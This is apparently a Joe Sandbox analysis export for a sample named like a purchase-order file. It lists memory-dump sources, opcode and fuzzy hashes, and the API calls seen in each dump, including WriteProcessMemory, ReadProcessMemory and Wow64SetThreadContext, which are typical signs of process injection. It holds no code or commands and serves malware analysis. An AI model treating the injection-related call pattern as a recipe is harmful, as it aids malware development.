                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: 232f915f3e9c04a17b06a77dfafc5b04210258370e587e6a4f9d191655b6ae67
                                                                                                                                              • Instruction ID: 1453e64bec816b353ba37bcebb3fee63167319d5d34407ac57306bfbcf2f9b7a
                                                                                                                                              • Opcode Fuzzy Hash: 232f915f3e9c04a17b06a77dfafc5b04210258370e587e6a4f9d191655b6ae67
                                                                                                                                              • Instruction Fuzzy Hash: B341F1B0C0071DCBEF24DFAAC844B9EBBB5BF48704F20806AD409AB255DB756945CF90
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00F959A9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: f55b9aed0859913a506484588929bc4a5278454a5cc1e9fafd839f77ea6d0a2c
                                                                                                                                              • Instruction ID: 5ad7dd41996e93bffdaf5f2f33bb770b529637f8b842f6ed4d2163e306db2dd9
                                                                                                                                              • Opcode Fuzzy Hash: f55b9aed0859913a506484588929bc4a5278454a5cc1e9fafd839f77ea6d0a2c
                                                                                                                                              • Instruction Fuzzy Hash: 4E4112B0C00B19CEEF24CFA9C8847CDBBB5BF48714F24805AD449AB255DB755946CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                              • Opcode ID: 32069a113e4630e7280b9013f850d9622b4740769c64ce57d61053380f38910b
                                                                                                                                              • Instruction ID: 30938245844a80308164afc450259d4863e9477b338b7997f67269723f883372
                                                                                                                                              • Opcode Fuzzy Hash: 32069a113e4630e7280b9013f850d9622b4740769c64ce57d61053380f38910b
                                                                                                                                              • Instruction Fuzzy Hash: A0317AB29043999FCB11DFA9C804ADEBFF8EF49310F14806AE954A7261C3359851DFA5
                                                                                                                                              APIs
                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0702311A,?,?,?,?,?), ref: 070231BF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                              • Opcode ID: be5afbd88c97e348d1df74270cae6e1d99037379b6668ce6e8305d9c5b32e6d3
                                                                                                                                              • Instruction ID: 97ea20850a3dfebfb4c7d20a67724f093f1b8db01830e6482d9561dd10a79397
                                                                                                                                              • Opcode Fuzzy Hash: be5afbd88c97e348d1df74270cae6e1d99037379b6668ce6e8305d9c5b32e6d3
                                                                                                                                              • Instruction Fuzzy Hash: AE31CAF29003599FDB10DFA9C840BEEBFF8EB48310F10845AE494A7260C7399981DFA5
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0751512E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: d4d0dba4affe565d101c1a1ffadce76afe08068686f78ea8728229222b053af4
                                                                                                                                              • Instruction ID: ecaad97d99a5a339347ed63e71ed5a6ad0b76822b970c9cb46f89ee8b9d28e51
                                                                                                                                              • Opcode Fuzzy Hash: d4d0dba4affe565d101c1a1ffadce76afe08068686f78ea8728229222b053af4
                                                                                                                                              • Instruction Fuzzy Hash: 7021DEB6B001019FEB14EB69DC01BAEB7A2FFC4725F0481A9E509A7755DB74E821CBD0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Focus
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2734777837-0
                                                                                                                                              • Opcode ID: be1ee92d3891e19e0489036464c801e5684d7586e58eae49e5f9258be6b90623
                                                                                                                                              • Instruction ID: f27214eef76786e0930643f1821357504ae299c0fab69fc5b16e855880cd5b6a
                                                                                                                                              • Opcode Fuzzy Hash: be1ee92d3891e19e0489036464c801e5684d7586e58eae49e5f9258be6b90623
                                                                                                                                              • Instruction Fuzzy Hash: 9521ADB19003998FDB10CF69D445BEEBBB4FB48721F1485AAE804AB311C734A844CFE1
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0751C1BA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                              • Opcode ID: d6acb789fd3b296f3e975cdf1ad806d32cd94b4a1e3c12f0c3a38f7ce1f009be
                                                                                                                                              • Instruction ID: 1021ba0b80ad2a013ce76e84fce8614d1e57efdc9775287bcc944d723000f1ee
                                                                                                                                              • Opcode Fuzzy Hash: d6acb789fd3b296f3e975cdf1ad806d32cd94b4a1e3c12f0c3a38f7ce1f009be
                                                                                                                                              • Instruction Fuzzy Hash: 373198B4A402498FDB00DFAAD440ADEFFF0FB49314F10896AD419AB311C735A948CFA1
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07028E35,?,?), ref: 07028EE7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: f001f3d026298acef9e22317aa7e8182cb32d0876ab01901cf73539d20e9c4d6
                                                                                                                                              • Instruction ID: 26d00ae97e5ec1464f0143ceccc89462f732208bd72efe39f60162803d399e99
                                                                                                                                              • Opcode Fuzzy Hash: f001f3d026298acef9e22317aa7e8182cb32d0876ab01901cf73539d20e9c4d6
                                                                                                                                              • Instruction Fuzzy Hash: D03103B5D00319AFCB10CF9AD880ADEFBF4FB48324F14842AE919A7250C774A941CFA4
                                                                                                                                              APIs
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0751314A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: TextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                              • Opcode ID: 17b9205ff922db200fb380b2658348c3919ce55c0103e6b747a4ddec00cbe082
                                                                                                                                              • Instruction ID: cf84da0fa458d93e38daa620d44810667f3ab59b514fa2aba846c2254fdbd81c
                                                                                                                                              • Opcode Fuzzy Hash: 17b9205ff922db200fb380b2658348c3919ce55c0103e6b747a4ddec00cbe082
                                                                                                                                              • Instruction Fuzzy Hash: 032168B68042499FDB10CF9AC844BDEFFF4EF49310F15806AE858A7241C378A545CFA5
                                                                                                                                              APIs
                                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07028E35,?,?), ref: 07028EE7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DrawText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2175133113-0
                                                                                                                                              • Opcode ID: 1b42d57dc86f64448fa4fc5a8db0fcded8799d6c279109121ef9f965d0538fea
                                                                                                                                              • Instruction ID: 0d2dcaa2e0495a8b0d73a862ae73f558de73da8c7925054f1ad0510311705f55
                                                                                                                                              • Opcode Fuzzy Hash: 1b42d57dc86f64448fa4fc5a8db0fcded8799d6c279109121ef9f965d0538fea
                                                                                                                                              • Instruction Fuzzy Hash: 9E31E3B5D002199FCB11CF99D980ADEFBF4FF48324F14842AE859A7250C774A545CFA4
                                                                                                                                              APIs
                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0710CAA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                              • Opcode ID: e7cfa29cc5983e4cf27c6a40fd8b2deecaf84dc8da00de5df33cb1b4a26de4bc
                                                                                                                                              • Instruction ID: 3c2f7cb833a056976b56c9c6279a91b70ecbf1e5e0b719992fad90e12692cdd4
                                                                                                                                              • Opcode Fuzzy Hash: e7cfa29cc5983e4cf27c6a40fd8b2deecaf84dc8da00de5df33cb1b4a26de4bc
                                                                                                                                              • Instruction Fuzzy Hash: 322115B19002599FCB10CFA9C885BDEBBF5FB48310F10882AE958A7291D7789954CBA4
                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoW.USER32(?,00000000), ref: 0751323C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassInfo
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3534257612-0
                                                                                                                                              • Opcode ID: a3198b30ce915f90f6ece7307963ff9c5af05dd0aaadd60919bf5edaf5419c6a
                                                                                                                                              • Instruction ID: ddbb4a1c61b3d986c46a1d7a1f0232dc178f407c5c83a647347e42dc87aad6da
                                                                                                                                              • Opcode Fuzzy Hash: a3198b30ce915f90f6ece7307963ff9c5af05dd0aaadd60919bf5edaf5419c6a
                                                                                                                                              • Instruction Fuzzy Hash: 822137B190031A9FDB10DF9AC884ADEFBF4FB48310F14806AE558A3240D335A545CB64
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D427
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: ea81299bc3ad40f6ba4d4cf8cd0b41ceca37cfc49d23761426edc5d8dd36d574
                                                                                                                                              • Instruction ID: 324c1a7982da2269afc64b9e5073f0ba305e13d584d4ca8bd5ac47497bd4c6c0
                                                                                                                                              • Opcode Fuzzy Hash: ea81299bc3ad40f6ba4d4cf8cd0b41ceca37cfc49d23761426edc5d8dd36d574
                                                                                                                                              • Instruction Fuzzy Hash: 612114B5D002589FDB10CFAAD985AEEFFF4EB48320F24801AE954A7351C375A944CFA0
                                                                                                                                              APIs
                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 075148A7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FromMonitorPoint
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1566494148-0
                                                                                                                                              • Opcode ID: 9d9392dd56058c5a75b4e47a3991b856462fdae4adec1cc13a724bf229b85639
                                                                                                                                              • Instruction ID: 187509c96f2efe1e31267936b9ffc2d005fde962c56265233ce9c87cb6646ba8
                                                                                                                                              • Opcode Fuzzy Hash: 9d9392dd56058c5a75b4e47a3991b856462fdae4adec1cc13a724bf229b85639
                                                                                                                                              • Instruction Fuzzy Hash: E3213BB1A002899FDB10DF99D449BEEFBF5EB48310F10841AE555A7750CB74A944CFA1
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0C46127D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: 8cd65281ebfe56c4329f8f1ef7a978d110b6f5ba28ae4ef8bded746620983564
                                                                                                                                              • Instruction ID: bab57f0237563f5763014b37150217d33e2001bc89989f9778da1237cb23ffa5
                                                                                                                                              • Opcode Fuzzy Hash: 8cd65281ebfe56c4329f8f1ef7a978d110b6f5ba28ae4ef8bded746620983564
                                                                                                                                              • Instruction Fuzzy Hash: D02134B18043499FDB05CF99C889AAAFFF8FB49310F14845AD458A76A1C334A944CFA1
                                                                                                                                              APIs
                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0710CF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                              • Opcode ID: b9bcb94ae8c735fc1ffcefcb039e3c3eaed6dde3295ae742cd8e20669f8c26ea
                                                                                                                                              • Instruction ID: 53754b5a3290f0bac7f03aabf3e04713ba3247e82269959ab48aa2ecf0ec78bb
                                                                                                                                              • Opcode Fuzzy Hash: b9bcb94ae8c735fc1ffcefcb039e3c3eaed6dde3295ae742cd8e20669f8c26ea
                                                                                                                                              • Instruction Fuzzy Hash: EE21F8B19003599FCB10DFAAC845ADEFBF5FF48310F108429E559A7250C7759544CFA5
                                                                                                                                              APIs
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0710C8F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787369470.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7100000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                              • Opcode ID: a94030b14ca8c8ae9963a0f836cffa6ef4a51c34969502bb669b4868350e1d24
                                                                                                                                              • Instruction ID: 8deaeb6028f31c1bc8ea841c394336c7601b77519bed2ca6455dd40e1b5c5034
                                                                                                                                              • Opcode Fuzzy Hash: a94030b14ca8c8ae9963a0f836cffa6ef4a51c34969502bb669b4868350e1d24
                                                                                                                                              • Instruction Fuzzy Hash: 2F2138B1D003098FDB10DFAAC4857EEBBF4EF48324F10842AD459A7280CB789944CFA5
                                                                                                                                              APIs
                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F9D427
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                              • Opcode ID: 77c25db9ca6322baefff2a631d20dbec517ebc541dee5cc5f7a721d0bc8516c9
                                                                                                                                              • Instruction ID: 396aa6024f99d86fd66c877cb7499125205d0763c66e978ff05a0b02567161df
                                                                                                                                              • Opcode Fuzzy Hash: 77c25db9ca6322baefff2a631d20dbec517ebc541dee5cc5f7a721d0bc8516c9
                                                                                                                                              • Instruction Fuzzy Hash: 7C21C2B59002589FDB10CFAAD984ADEFBF8EB48320F14841AE958A7350D375A944CFA5
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B883A95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 76d200009f03cf5fcf69d18d77d0bc63ef925f7bc29852fdbc8d8f0264385779
                                                                                                                                              • Instruction ID: c9be5eab2e25edf33acab916c2b06854d5862df241af336a9197d1b127d27fd7
                                                                                                                                              • Opcode Fuzzy Hash: 76d200009f03cf5fcf69d18d77d0bc63ef925f7bc29852fdbc8d8f0264385779
                                                                                                                                              • Instruction Fuzzy Hash: 8C115E353145508FC719BB3DC8548AA77AAAFC5A1131500AEE501CB3B2EE66CC02C795
                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoW.USER32(?,00000000), ref: 0751323C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassInfo
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3534257612-0
                                                                                                                                              • Opcode ID: c9b7cc912bd32df1d8626d99e6a8728b9e5f188d9fe21e6d2afb45d5284b2a96
                                                                                                                                              • Instruction ID: 27d8eb15a388be4c60e95e685222cc01d9f45d16f1ae2acf3e7c814372843671
                                                                                                                                              • Opcode Fuzzy Hash: c9b7cc912bd32df1d8626d99e6a8728b9e5f188d9fe21e6d2afb45d5284b2a96
                                                                                                                                              • Instruction Fuzzy Hash: 952115B19017199FDB10DF9AC884ADEFBF4FB48310F14806AE858A7240D375A944CB64
                                                                                                                                              APIs
                                                                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 075148A7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FromMonitorPoint
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1566494148-0
                                                                                                                                              • Opcode ID: b33047c406af83be46ad62e7317b910e945f27399650c2b0965ea1703835c8aa
                                                                                                                                              • Instruction ID: 2a745af02d2a0b27f4d3ca25df019bc60785aff81c5ec09ef35b04d7e094b338
                                                                                                                                              • Opcode Fuzzy Hash: b33047c406af83be46ad62e7317b910e945f27399650c2b0965ea1703835c8aa
                                                                                                                                              • Instruction Fuzzy Hash: 972145B09003899FDB10DF99D449BEEBBF4FB48314F20841AE859AB641C775A945CFA1
                                                                                                                                              APIs
                                                                                                                                              • EnumThreadWindows.USER32(?,00000000,?), ref: 0751C299
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumThreadWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2941952884-0
                                                                                                                                              • Opcode ID: b3e221e15e7846e3665cc78fa269eea34c2f8e47db89be8d9056516e6356f4a0
                                                                                                                                              • Instruction ID: 505838956b3942bb52043480d4f2963b989479160d29496d115d463698d98687
                                                                                                                                              • Opcode Fuzzy Hash: b3e221e15e7846e3665cc78fa269eea34c2f8e47db89be8d9056516e6356f4a0
                                                                                                                                              • Instruction Fuzzy Hash: DC2158B5900209CFDB14CFAAC844BEEFBF5BB88320F14842AD468A7350D779A945CF65
                                                                                                                                              APIs
                                                                                                                                              • EnumThreadWindows.USER32(?,00000000,?), ref: 0751C299
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumThreadWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2941952884-0
                                                                                                                                              • Opcode ID: 804ef4c44b819cf9b920e10560e5101384b883bf5329ef58e13650a227e3e85d
                                                                                                                                              • Instruction ID: b7efec7ca61a4533c7591f4b9344440caee7f495013911b189b40cc209e29745
                                                                                                                                              • Opcode Fuzzy Hash: 804ef4c44b819cf9b920e10560e5101384b883bf5329ef58e13650a227e3e85d
                                                                                                                                              • Instruction Fuzzy Hash: 0C2106B19002198FDB14DF9AC844BEEFBF5FB88320F14842AD468A7350D779A945CFA5
                                                                                                                                              APIs
                                                                                                                                              • GetForegroundWindow.USER32 ref: 07514259
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                              • Opcode ID: d97aa5155a89ad40552e22c037af768006178286574fe76d8ee2aaacb783e163
                                                                                                                                              • Instruction ID: 0edfeb6619ffb20f4f5479df28bc11e727850258a41932dd4819505208978070
                                                                                                                                              • Opcode Fuzzy Hash: d97aa5155a89ad40552e22c037af768006178286574fe76d8ee2aaacb783e163
                                                                                                                                              • Instruction Fuzzy Hash: A921CDB09043858EDB11AFA8C4082EEBFF1BB84311F24485AC46AA7340CB318584CFA5
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F9B126
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1776822682.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_f90000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: b738cb3d894aeb7b708e68ed51262bf6057873cdc175d3f22e507710b5b9d80e
                                                                                                                                              • Instruction ID: 9564a30b8a05592ffc3071fcfce243dea3bad473b01e87a440cbdf7686cc77f3
                                                                                                                                              • Opcode Fuzzy Hash: b738cb3d894aeb7b708e68ed51262bf6057873cdc175d3f22e507710b5b9d80e
                                                                                                                                              • Instruction Fuzzy Hash: 93110472A042448FFF10DB69E9107EEBBF5AFC5324F14845ED44497252C7749845DFA0
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B883A95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: 1e592fa7705a64b6e883667235351b14d22670b8a493f644db164921bec7a8e3
                                                                                                                                              • Instruction ID: 3f06b76bfa09d1550d3b56f04eab8975b0ddad574a2461e8af06b85efd3b7ca7
                                                                                                                                              • Opcode Fuzzy Hash: 1e592fa7705a64b6e883667235351b14d22670b8a493f644db164921bec7a8e3
                                                                                                                                              • Instruction Fuzzy Hash: E911DB343109118FC619AA3DC55486E77EAAFC5A1531540AAE902CB3B6EE76DC028795
                                                                                                                                              APIs
                                                                                                                                              • GetForegroundWindow.USER32 ref: 07514259
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                              • Opcode ID: 325d4c39113cbdc3f797ae2beff0e18007fb30ad8c0b45171bf20dc8d74b2c7c
                                                                                                                                              • Instruction ID: 62045e76753fb9d5ba2a985057d314148b5fdf8fd1a51101c4d0da459320537c
                                                                                                                                              • Opcode Fuzzy Hash: 325d4c39113cbdc3f797ae2beff0e18007fb30ad8c0b45171bf20dc8d74b2c7c
                                                                                                                                              • Instruction Fuzzy Hash: 8D116AB49003498FDB10AFA9C5486DEBFF5BB88311F64885AD42AA7340DB359584CFA5
                                                                                                                                              APIs
